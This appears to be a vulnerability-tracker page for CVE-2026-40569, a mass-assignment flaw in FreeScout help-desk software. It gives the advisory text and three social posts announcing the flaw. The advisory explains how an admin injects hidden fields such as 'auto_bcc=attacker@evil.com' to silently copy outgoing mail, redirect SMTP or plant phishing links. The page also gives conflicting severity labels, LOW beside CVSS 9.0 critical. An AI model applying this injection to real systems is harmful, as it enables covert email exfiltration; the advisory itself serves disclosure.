CVE-2026-40569Disclosure

LOWCVSS 9.0 · CRITICAL

Signal is active with 2 mentions in latest observed window

Immediate actions

  • Track advisory updates for patch or workaround availability

Recommended action window: Monitor and triage in normal cycle

NVD description

FreeScout is a free self-hosted help desk and shared mailbox. Versions prior to 1.8.213 have a mass assignment vulnerability in the mailbox connection settings endpoints of FreeScout (`connectionIncomingSave()` at `app/Http/Controllers/MailboxesController.php:468` and `connectionOutgoingSave()` at line 398). Both methods pass `$request->all()` directly to `$mailbox->fill()` without any field allowlisting, allowing an authenticated admin to overwrite any of the 32 fields in the Mailbox model's `$fillable` array -- including security-critical fields that do not belong to the connection settings form, such as `auto_bcc`, `out_server`, `out_password`, `signature`, `auto_reply_enabled`, and `auto_reply_message`. Validation in `connectionIncomingSave()` is entirely commented out, and the validator in `connectionOutgoingSave()` only checks value formats for SMTP fields without stripping extra parameters. An authenticated admin user can exploit this by appending hidden parameters (e.g., `[email protected]`) to a legitimate connection settings save request. Because the `auto_bcc` field is not displayed on the connection settings form (it only appears on the general mailbox settings page), the injection is invisible to other administrators reviewing connection settings. Once set, every outgoing email from the affected mailbox is silently BCC'd to the attacker via the `SendReplyToCustomer` job. The same mechanism allows redirecting outgoing SMTP through an attacker-controlled server, injecting tracking pixels or phishing links into email signatures, and enabling attacker-crafted auto-replies -- all from a single HTTP request. This is particularly dangerous in multi-admin environments where one admin can silently surveil mailboxes managed by others, and when an admin session is compromised via a separate vulnerability (e.g., XSS), the attacker gains persistent email exfiltration that survives session expiry. Version 1.8.213 fixes the issue.

0.0/ 10 priority

Sources & remediation

Weakness type (CWE)
CWE-284CWE-915

Priority

LOW

Exploitation

NONE

PoC

NONE

Patch

NONE

Momentum

STABLE

Threat summary

  • 3 mentions across 2 observed days
  • Momentum state: stable

What's happening

  • Technical details provided in 3 signals
  • Disclosure: 3 classified signals
  • Peaked at 2 mentions on most recent observed day (2026-04-27)
  • 3 total mentions across 2 days

Deep dive

Activity timeline3 mentions / 2d
01122Mentions · 2026-04-21: 1Mentions · 2026-04-27: 2Technical Details · 2026-04-21: 1Technical Details · 2026-04-27: 204-2104-27
Signal classification1 categories
Disclosure
3100.0%
Referenced assets3 URLs
Classification over time
DateTotalLabels
2026-04-211
Disclosure1
2026-04-272
Disclosure2
Full discourse3 posts
  • Infoflowcloud@infoflowcloud
    Disclosure

    🚨*CVE* CVE-2026-40569 FreeScout is a free self-hosted help desk and shared mailbox. Versions prior to 1.8.213 have a mass assignment vulnerability in the mailbox connection settings endpoi… https://www.cve.org/CVERecord?id=CVE-2026-40569 ----- Traducción: CVE-2026-40569 Fre… http://infoflow.cloud`

    Post summary

    The post discloses a new mass‑assignment vulnerability in FreeScout versions before 1.8.213, providing technical detail but no evidence of exploitation, PoC, patch, or workaround.

    0000047
    72 followersView on X
  • CVE@CVEnew
    Disclosure

    CVE-2026-40569 FreeScout is a free self-hosted help desk and shared mailbox. Versions prior to 1.8.213 have a mass assignment vulnerability in the mailbox connection settings endpoi… https://www.cve.org/CVERecord?id=CVE-2026-40569

    Post summary

    The post announces CVE-2026-40569 as a mass‐assignment vulnerability affecting FreeScout versions before 1.8.213, without detailing any exploit proof, active usage, or available patch.

    00000191
    57.3K followersView on X
  • 0day Signal@0dayPublishing
    Disclosure

    🚨 CVE-2026-40569: FreeScout's Mass Assignment in M... Mass assignment through `$request->all()` lets admins inject `auto_bcc=attacker@evil.com` for silent email exfiltration... https://zerodaysignal.com/vulnerability/CVE-2026-40569 #netsec #vulnerability #CVE #sysadmin #zeroday

    Post summary

    The tweet announces CVE-2026-40569, detailing a mass assignment flaw in FreeScout that permits injection of an auto_bcc field for silent email exfiltration. It provides a technical overview but no PoC, exploit, patch, or active exploitation claim.

    0000047
    218 followersView on X

Explore more